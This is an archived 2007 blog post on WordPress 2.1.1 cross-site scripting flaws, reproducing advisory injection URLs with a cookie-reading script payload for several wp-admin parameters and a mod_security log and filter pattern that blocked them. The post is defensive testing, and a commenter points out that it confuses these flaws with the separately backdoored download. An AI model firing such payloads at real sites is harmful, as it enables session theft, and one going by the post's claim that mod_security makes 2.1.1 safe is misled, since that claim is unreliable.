This is an archived article. Please check my homepage for more up to date articles.
- Posted by Justin
- Posted in everyday
Wordpress is dangerous, Upgrade now! seems to be a headline that is traveling the blogosphere in reference to the Wordpress 2.1.1 release. According to numerous websites, there are a number of vulnerabilities that are included within the 2.1.1 release and Wordpress.org is notifying their users of a dangerous release and asking everyone to download the new 2.1.2.
What I find interesting is how Wordpress.org is informing everyone that someone, aka a cracker gained access to their file-system and modified the original source of the WP2.1.1 download. Not all users were affected? According to the Wordpress XSS/CSRF advisory that was posted on February 27, 2007 the vulnerabilities existed within the post-parameter of wordpress.
What am I talking about?
Okay, so Stefan Friedli discovered some new vulnerabilities in Wordpress 2.1.1, tested them and wrote about them on February 27, 2007. The vulnerabilities were simply Cross site request forgeries (CSRF) calls to post-parameter of wordpress.
According to the advisory
This list may not be exhaustive. It illustrated that the flaw with confirmation dialogs in Wordpress is not limited to the “Delete Post”-function. Fixing the validation of the post parameter as suggested by e.g. Secunia does not fix the problem and does not reduce the threat of cross-site-scripting or any other webbased exploitation.
I tested the attack vectors and a few variants of each on my test server and a production server both running wordpress 2.1.1 and mod_security.
Possible injection…
… when deleting posts as mentioned in Samenspenders advisory (unvalidated parameter: post, file: post.php)
>http://target.tld/wp-admin/post.php?action=delete&post=
'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E… when deleting comments (unvalidated parameter: c, file: comment.php)
>http://target.tld/wp-admin/comment.php?action=deletecomment&p=39&c=
'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E… when deleting pages (unvalidated parameter: page, file: page.php)
>http://target.tld/wp-admin/page.php?action=delete&post=
'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E… when deleting categories (unvalidated parameter: cat_ID, file: categories.php)
>http://target.tld/wp-admin/categories.php?action=delete&cat_ID=
'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E… when deleting comments (unvalidated parameter: c, file: comment.php)
>http://target.tld/wp-admin/comment.php?action=deletecomment&p=35&c=
'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
mod_security definitely did its part by dis-allowing the attempt to successfully execute, the error_log showed:
[error] [client XXX.XXX.XXX.XXX] mod_security: Access denied with code 500. Pattern match "<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>" at REQUEST_URI [hostname "target.tld"] [uri "/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E"] [unique_id "eN3hmkZVwpIAAAgSjcIAAAAH"]
mod_security blocked each attack vector as well. Therefore, I believe it is safe to say, if you’re operating on version 2.1.1 and have not upgraded to 2.1.2, you might be safe. At least I’m not sweating the vulnerability. Its definitely difficult at times to keep up with Wordpress 0day XSS and CSRF vulnerabilities. Hopefully the kiddies haven’t gotten a hold of any major blocks because of this attack.
Just a little more info…
the full advisory
Mar 02
This entry was posted on Friday, March 2nd, 2007 at 10:22 pmand is filed under everyday. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.The version of my website you are viewing is currently out of date. The content is still here as an archive and you are free to continue browsing it, however, I do recommend you check out my current homepage for more up to date information.
Sponsors
3 Comments Wordpress Vulnerability, CSRF/XSS Details
Stefan Friedli
March 5th, 2007 at 3:03 am
1Hi Justin
You’re mixing up two things here: First issue is a lack of input validation for various parameters in the regular release of wordpress that I described in my advisory you linked in your article.
The second thing you’re mentioning is the maliciously manipulated version of 2.1.1 that was available from Wordpress official download site for a while due to a badly secured server. Several files of this distribution were backdoored by the intruder, so mod_security won’t most possibly save your a** there ;).
Cheers
Stefan
werutzb
October 7th, 2008 at 6:30 pm
2Hi!
I want to extend my SQL experience.
I red that many SQL resources and would like to
read more about SQL for my work as oracle database manager.
What can you recommend?
Thanks,
Werutz
kargo
September 7th, 2009 at 12:18 pm
3Wordpress Vulnerability, CSRF/XSS Details- Justin Shattuck great article thank you.
RSS feed for comments on this post